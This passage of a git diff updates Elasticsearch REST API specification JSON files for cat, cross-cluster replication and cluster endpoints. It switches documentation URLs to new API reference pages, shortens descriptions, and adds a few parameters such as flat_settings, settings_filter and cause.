"stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_trained_models.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_trained_models.json index 5176b9d4ca69f..c0d95b222fd86 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_trained_models.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_trained_models.json @@ -1,8 +1,8 @@ { "cat.ml_trained_models":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/cat-trained-model.html", - "description": "Gets configuration and usage information about inference trained models." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-trained-models", + "description": "Get trained models" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodeattrs.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodeattrs.json index b92f023323342..8e65962dbafe6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodeattrs.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodeattrs.json @@ -1,8 +1,8 @@ { "cat.nodeattrs":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-nodeattrs.html", - "description":"Returns information about custom node attributes." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-nodeattrs", + "description":"Get node attribute information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodes.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodes.json index b1205e38ecd40..779b7111fb284 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodes.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.nodes.json @@ -1,8 +1,8 @@ { "cat.nodes":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-nodes.html", - "description":"Returns basic statistics about performance of cluster nodes." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-nodes", + "description":"Get node information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.pending_tasks.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.pending_tasks.json index 40601a11b6803..214ba308bd34f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.pending_tasks.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.pending_tasks.json @@ -1,8 +1,8 @@ { "cat.pending_tasks":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-pending-tasks.html", - "description":"Returns a concise representation of the cluster pending tasks." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-pending-tasks", + "description":"Get pending task information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.plugins.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.plugins.json index 48635d2fe06e0..c3bbba5e2aabe 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.plugins.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.plugins.json @@ -1,8 +1,8 @@ { "cat.plugins":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-plugins.html", - "description":"Returns information about installed plugins across nodes node." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-plugins", + "description":"Get plugin information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.recovery.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.recovery.json index 879314629f968..020ad1111be11 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.recovery.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.recovery.json @@ -1,8 +1,8 @@ { "cat.recovery":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-recovery.html", - "description":"Returns information about index shard recoveries, both on-going completed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-recovery", + "description":"Get shard recovery information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.repositories.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.repositories.json index 3dad7a0039c6c..53c1a9f3033b9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.repositories.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.repositories.json @@ -1,8 +1,8 @@ { "cat.repositories":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-repositories.html", - "description":"Returns information about snapshot repositories registered in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-repositories", + "description":"Get snapshot repository information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.segments.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.segments.json index eee7e5a5c4b29..723b00ddd8d84 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.segments.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.segments.json @@ -1,8 +1,8 @@ { "cat.segments":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-segments.html", - "description":"Provides low-level information about the segments in the shards of an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-segments", + "description":"Get segment information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.shards.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.shards.json index 24f4a4beceae5..f19e5b708ed47 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.shards.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.shards.json @@ -1,8 +1,8 @@ { "cat.shards":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-shards.html", - "description":"Provides a detailed view of shard allocation on nodes." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-shards", + "description":"Get shard information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.snapshots.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.snapshots.json index 3b72e8a1ebc1a..6e69435f9d7bc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.snapshots.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.snapshots.json @@ -1,8 +1,8 @@ { "cat.snapshots":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-snapshots.html", - "description":"Returns all snapshots in a specific repository." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-snapshots", + "description":"Get snapshot information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.tasks.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.tasks.json index e7329cf8dbbf0..25e4a26d98546 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.tasks.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.tasks.json @@ -1,8 +1,8 @@ { "cat.tasks":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/tasks.html", - "description":"Returns information about the tasks currently executing on one or more nodes in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-tasks", + "description":"Get task information" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.templates.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.templates.json index e7ac67c8612b9..3261afdaa7380 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.templates.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.templates.json @@ -1,8 +1,8 @@ { "cat.templates":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-templates.html", - "description":"Returns information about existing templates." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-templates", + "description":"Get index template information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.thread_pool.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.thread_pool.json index 1bd61a29725c1..85e752d3b3718 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.thread_pool.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.thread_pool.json @@ -1,8 +1,8 @@ { "cat.thread_pool":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-thread-pool.html", - "description":"Returns cluster-wide thread pool statistics per node.\nBy default the active, queue and rejected statistics are returned for all thread pools." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-thread-pool", + "description":"Get thread pool statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.transforms.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.transforms.json index c0dd769dc3d50..1a3938d275f83 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.transforms.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.transforms.json @@ -1,8 +1,8 @@ { "cat.transforms":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/cat-transforms.html", - "description": "Gets configuration and usage information about transforms." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-transforms", + "description": "Get transform information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.delete_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.delete_auto_follow_pattern.json index c316e9fcbd36c..0078a8fa53cc5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.delete_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.delete_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.delete_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-delete-auto-follow-pattern.html", - "description": "Deletes auto-follow patterns." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-delete-auto-follow-pattern", + "description": "Delete auto-follow patterns" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow.json index 642477cb45e48..cc019dfeec0ad 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow.json @@ -1,8 +1,8 @@ { "ccr.follow":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-put-follow.html", - "description": "Creates a new follower index configured to follow the referenced leader index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow", + "description": "Create a follower" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_info.json index a2af3f9be77d1..2878e0e6fb024 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_info.json @@ -1,8 +1,8 @@ { "ccr.follow_info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-get-follow-info.html", - "description": "Retrieves information about all follower indices, including parameters and status for each follower index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow-info", + "description": "Get follower information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_stats.json index 75d0bafb5083e..ad0fe0960e1ec 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.follow_stats.json @@ -1,8 +1,8 @@ { "ccr.follow_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-get-follow-stats.html", - "description": "Retrieves follower stats. return shard-level stats about the following tasks associated with each shard for the specified indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow-stats", + "description": "Get follower stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.forget_follower.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.forget_follower.json index 61a132a1f4ac4..308d1c72b3fe7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.forget_follower.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.forget_follower.json @@ -1,8 +1,8 @@ { "ccr.forget_follower":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-post-forget-follower.html", - "description": "Removes the follower retention leases from the leader." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-forget-follower", + "description": "Forget a follower" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.get_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.get_auto_follow_pattern.json index 663f37fca3a9a..b4ddda356f891 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.get_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.get_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.get_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-get-auto-follow-pattern.html", - "description": "Gets configured auto-follow patterns. Returns the specified auto-follow pattern collection." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-get-auto-follow-pattern-1", + "description": "Get auto-follow patterns" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_auto_follow_pattern.json index c766304fc0512..ea1688a30b90c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.pause_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-pause-auto-follow-pattern.html", - "description": "Pauses an auto-follow pattern" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-pause-auto-follow-pattern", + "description": "Pause an auto-follow pattern" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_follow.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_follow.json index 1c1fcf71d08ff..5d850837e42e1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_follow.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.pause_follow.json @@ -1,8 +1,8 @@ { "ccr.pause_follow":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-post-pause-follow.html", - "description": "Pauses a follower index. The follower index will not fetch any additional operations from the leader index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-pause-follow", + "description": "Pause a follower" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.put_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.put_auto_follow_pattern.json index 6f5f03bc9a3d2..77218122120a1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.put_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.put_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.put_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-put-auto-follow-pattern.html", - "description": "Creates a new named collection of auto-follow patterns against a specified remote cluster. Newly created indices on the remote cluster matching any of the specified patterns will be automatically configured as follower indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-put-auto-follow-pattern", + "description": "Create or update auto-follow patterns" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_auto_follow_pattern.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_auto_follow_pattern.json index a4ea108426ed8..5a0c3dd9065fb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_auto_follow_pattern.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_auto_follow_pattern.json @@ -1,8 +1,8 @@ { "ccr.resume_auto_follow_pattern":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-resume-auto-follow-pattern.html", - "description": "Resumes an auto-follow pattern that has been paused" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-resume-auto-follow-pattern", + "description": "Resume an auto-follow pattern" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_follow.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_follow.json index 854ff83291a8b..478e26304e22a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_follow.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.resume_follow.json @@ -1,8 +1,8 @@ { "ccr.resume_follow":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-post-resume-follow.html", - "description": "Resumes a follower index that has been paused" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-resume-follow", + "description": "Resume a follower" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.stats.json index 5ebc781109abd..0cfbb3a42bbc9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.stats.json @@ -1,8 +1,8 @@ { "ccr.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-get-stats.html", - "description": "Gets all stats related to cross-cluster replication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-stats", + "description": "Get cross-cluster replication stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.unfollow.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.unfollow.json index 096d39fa16480..67342c484251c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.unfollow.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ccr.unfollow.json @@ -1,8 +1,8 @@ { "ccr.unfollow":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ccr-post-unfollow.html", - "description": "Stops the following task associated with a follower index and removes index metadata and settings associated with cross-cluster replication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-unfollow", + "description": "Unfollow an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/clear_scroll.json b/rest-api-spec/src/main/resources/rest-api-spec/api/clear_scroll.json index 2d76e1e10d2ba..c530ee3453e24 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/clear_scroll.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/clear_scroll.json @@ -1,8 +1,8 @@ { "clear_scroll":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/clear-scroll-api.html", - "description":"Explicitly clears the search context for a scroll." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-clear-scroll", + "description":"Clear a scrolling search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/close_point_in_time.json b/rest-api-spec/src/main/resources/rest-api-spec/api/close_point_in_time.json index c25ac88847d1c..d9c7da2904c65 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/close_point_in_time.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/close_point_in_time.json @@ -1,7 +1,7 @@ { "close_point_in_time":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/point-in-time-api.html", + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-open-point-in-time", "description":"Close a point in time" }, "stability":"stable", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.allocation_explain.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.allocation_explain.json index a3922033ec2a8..d054cccedf830 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.allocation_explain.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.allocation_explain.json @@ -1,8 +1,8 @@ { "cluster.allocation_explain":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-allocation-explain.html", - "description":"Provides explanations for shard allocations in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-allocation-explain", + "description":"Explain the shard allocations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_component_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_component_template.json index 041c1b35a2e5b..3a261d3d5ff52 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_component_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_component_template.json @@ -1,8 +1,8 @@ { "cluster.delete_component_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-component-template.html", - "description":"Deletes a component template" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-component-template", + "description":"Delete component templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_voting_config_exclusions.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_voting_config_exclusions.json index fdc2364e456e4..c2dc21e8795e1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_voting_config_exclusions.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.delete_voting_config_exclusions.json @@ -1,8 +1,8 @@ { "cluster.delete_voting_config_exclusions":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/voting-config-exclusions.html", - "description":"Clears cluster voting config exclusions." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-post-voting-config-exclusions", + "description":"Clear cluster voting config exclusions" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.exists_component_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.exists_component_template.json index b2503659329a3..b81463accafe4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.exists_component_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.exists_component_template.json @@ -1,8 +1,8 @@ { "cluster.exists_component_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-component-template.html", - "description":"Returns information about whether a particular component template exist" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-component-template", + "description":"Check component templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_component_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_component_template.json index def0cc5fb8bb0..ae556fc86c59b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_component_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_component_template.json @@ -1,8 +1,8 @@ { "cluster.get_component_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-component-template.html", - "description":"Returns one or more component templates" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-component-template", + "description":"Get component templates" }, "stability":"stable", "visibility":"public", @@ -44,6 +44,14 @@ "include_defaults":{ "type":"boolean", "description":"Return all default configurations for the component template (default: false)" + }, + "flat_settings":{ + "type":"boolean", + "description":"Return settings in flat format (default: false)" + }, + "settings_filter":{ + "type":"string", + "description":"Filter out results, for example to filter out sensitive information. Supports wildcards or full settings keys" } } } diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_settings.json index 5004ab8de697d..978cbc43a3492 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.get_settings.json @@ -1,8 +1,8 @@ { "cluster.get_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-get-settings.html", - "description":"Returns cluster settings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-get-settings", + "description":"Get cluster-wide settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.health.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.health.json index 91712bbbded29..177c9efa6410f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.health.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.health.json @@ -1,8 +1,8 @@ { "cluster.health":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-health.html", - "description":"Returns basic information about the health of the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-health", + "description":"Get the cluster health status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.info.json index 39f51bf096506..17591d49a6e46 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.info.json @@ -1,8 +1,8 @@ { "cluster.info": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-info.html", - "description": "Returns different information about the cluster." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-info", + "description": "Get cluster info" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.pending_tasks.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.pending_tasks.json index 0ce718b3fffc4..d1e3f70d8f598 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.pending_tasks.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.pending_tasks.json @@ -1,8 +1,8 @@ { "cluster.pending_tasks":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-pending.html", - "description":"Returns a list of any cluster-level changes (e.g. create index, update mapping,\nallocate or fail shard) which have not yet been executed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-pending-tasks", + "description":"Get the pending cluster tasks" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.post_voting_config_exclusions.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.post_voting_config_exclusions.json index 591a4e9d27f3e..cc6d0ad27af07 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.post_voting_config_exclusions.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.post_voting_config_exclusions.json @@ -1,8 +1,8 @@ { "cluster.post_voting_config_exclusions":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/voting-config-exclusions.html", - "description":"Updates the cluster voting config exclusions by node ids or node names." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-post-voting-config-exclusions", + "description":"Update voting configuration exclusions" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_component_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_component_template.json index 4b7b032b43e13..3905e89707ddf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_component_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cluster.put_component_template.json @@ -1,8 +1,8 @@ { "cluster.put_component_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-component-template.html", - "description":"Creates or updates a component template" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-component-template", + "description":"Create or update a component template" }, "stability":"stable", "visibility":"public", @@ -33,9 +33,10 @@ "description":"Whether the index template should only be added if new or can also replace an existing one", "default":false }, - "timeout":{ - "type":"time", - "description":"Explicit operation timeout" + "cause": { + "type": "string", + "description": "User defined reason for create the component template", + "default": "api" }, "master_timeout":{ "type":"time", diff 